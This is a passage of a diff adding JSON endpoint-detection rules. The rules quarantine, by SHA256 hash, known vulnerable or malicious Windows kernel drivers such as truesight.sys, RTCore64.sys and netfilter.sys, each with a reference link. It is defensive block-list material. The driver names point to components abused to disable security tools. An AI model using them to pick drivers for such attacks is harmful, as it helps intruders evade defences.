"last_update": "2026-03-23T11:45:31.159312Z", + "creation_date": "2026-03-23T11:45:31.159314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159319Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f0c8d9088dc4f244448c52981a1787abacd05479b82a96ef3afd6e2df19794c1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "313e93bd-80ac-5af6-a9d7-8ba5cff3779e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154076Z", + "creation_date": "2026-03-23T11:45:31.154078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154083Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f1f37add1d46ef96b65eb6b7c391634daf8bc05ab6974309e78134c2b2bdf81", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3142ec86-2409-58ab-94c5-cd01beaa2697", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808377Z", + "creation_date": "2026-03-23T11:45:31.808379Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808385Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec3523b3ae9f1e93bd536d2bfd6bf7009f88cd72180fea24cc02e17b01b9c889", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "315327da-365c-587f-b3a4-362d429c6631", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492320Z", + "creation_date": "2026-03-23T11:45:31.492322Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492328Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8b4292dd2aa44e4a733a24aa3b49af054eede5f94bb18ed70a8ed7e8f3f7d003", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3159d35b-ef9c-53ad-b182-3d96a63b694e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827910Z", + "creation_date": "2026-03-23T11:45:30.827912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f0a96853916610e6482d05a736227f1714f3788446c30fc01580ebee8aa293aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31640dd0-8643-5767-823f-94c52d42d706", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621072Z", + "creation_date": "2026-03-23T11:45:29.621074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3169d357-3608-594c-9e8d-6fa626e7e748", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457069Z", + "creation_date": "2026-03-23T11:45:30.457073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "773dc9256c4eada182a5b41179a522740ba994eff30f868641bc91574705b8e3", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "316aa217-e371-521b-83bf-3e888dd7467f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460984Z", + "creation_date": "2026-03-23T11:45:30.460987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67cd6166d791bdf74453e19c015b2cb1e85e41892c04580034b65f9f03fe2e79", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "316ab67d-e06a-5444-b59a-d4cf7b2f5aee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807928Z", + "creation_date": "2026-03-23T11:45:31.807931Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807940Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22d850d29f5bae36a8981a5fe6464e6fe8759802efaaedd5be5de1ac9d5f521b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "316fbe63-f1e5-5dd6-a2cf-6c55dadbb027", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152704Z", + "creation_date": "2026-03-23T11:45:31.152706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd85a6de046a79940fe6db2228c0089f11cbd5b8f7b5dab5ea3c54de69f7f905", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "317cd096-8e96-54f7-b938-fb3ffefd8bc7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824587Z", + "creation_date": "2026-03-23T11:45:31.824591Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824600Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3434fb840a9987286f03a9653588f1798075a53fcacac6137bf58f98e632cbdb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31899b63-d7c0-5aa9-93da-44795b287fe0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.603976Z", + "creation_date": "2026-03-23T11:45:29.603978Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.603984Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7509d30b279e30893db7851a2912a5ffb29ec7e839220890d76de8e3a57b4872", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "318a83c6-7093-5733-bb90-7a379ee4ea21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983386Z", + "creation_date": "2026-03-23T11:45:29.983388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983394Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b8887921e4a22e24fd058ba5ac40061b4bb569ac7207b9548168af9d6995e7c", + "comment": "Vulnerable Kernel Driver (aka kbdcap64.sys) [https://www.loldrivers.io/drivers/6a7d882b-3d9d-4334-be5f-2e29c6bf9ff8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "318b0fcc-b94d-50af-884d-bea43d54cfe1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822761Z", + "creation_date": "2026-03-23T11:45:31.822764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2060c11cd0b210644db7af370f95fcb5c532e99a1cd09a6d56b8aaed2c040f15", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "318cabe3-d870-5a43-b6cc-7f832a23f946", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488639Z", + "creation_date": "2026-03-23T11:45:31.488641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8855f2a86d7447e75797314eace8ea6bddb960811e33fbb858ce3a1b39c48344", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "318f10e7-75a4-5f88-8734-a7942a045f26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967640Z", + "creation_date": "2026-03-23T11:45:29.967642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57038bb35abfae1e216782043c710be6972f49beae5b0f7b2b524f152d27eda5", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3193a6bc-e636-569f-bb47-d0f1f53630aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822424Z", + "creation_date": 
"2026-03-23T11:45:30.822426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "448048bafeb3796bfce954dd78e1b90f5849d9b3459c51750f210da8bafb8753", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31a48dbf-0638-585c-beca-635c01631411", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148416Z", + "creation_date": "2026-03-23T11:45:31.148418Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "415af8037165a928dbb77fb07599666acb3f5c816219971f76051a7e40ca6b30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"31a5d259-fe11-56c5-962b-5a6080060d61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980481Z", + "creation_date": "2026-03-23T11:45:29.980483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e28142ad02a1ac63ab86f97834321f30bb28e19d5c997bb0a13807ddb414c0e", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31b9cd4e-81db-5d44-92bd-7d33f1f2e368", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976782Z", + "creation_date": "2026-03-23T11:45:29.976784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976790Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f571b5302e900254cb1a46a7e1dd9190bceecb24c73ef3e36b4ff59517ad1e37", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31be4bd4-eabc-5407-99ea-c1917330299c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152390Z", + "creation_date": "2026-03-23T11:45:31.152394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eef20092ec73e387548789a739a64c8027dc18231ede2acf50891abff12242a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31c13a82-b385-5970-b146-9bc0c3aaf02a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822962Z", + "creation_date": "2026-03-23T11:45:30.822964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ff73944c43821b3d13abc37245c2c8d4eadc876dead02da45ea82fdf1525973", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31c23698-4a97-5fd5-9c49-a8dea25e2ca1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830018Z", + "creation_date": "2026-03-23T11:45:30.830020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d7b8383b044fac9f63b370428af5ed68d086beb5e719a4b49edf649e1851a5e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31ce8641-4ae3-5589-b66b-44e87923e33d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621212Z", + "creation_date": "2026-03-23T11:45:29.621214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621219Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0cb07a0624ddfacaa882af49e3783ae02c9fbd0ab232541a05a95b4a8abd8ef", + "comment": "Logitech CoreTemp vulnerable driver (aka LgCoreTemp.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31cec43b-640a-5965-b3de-a3e27dd53d21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
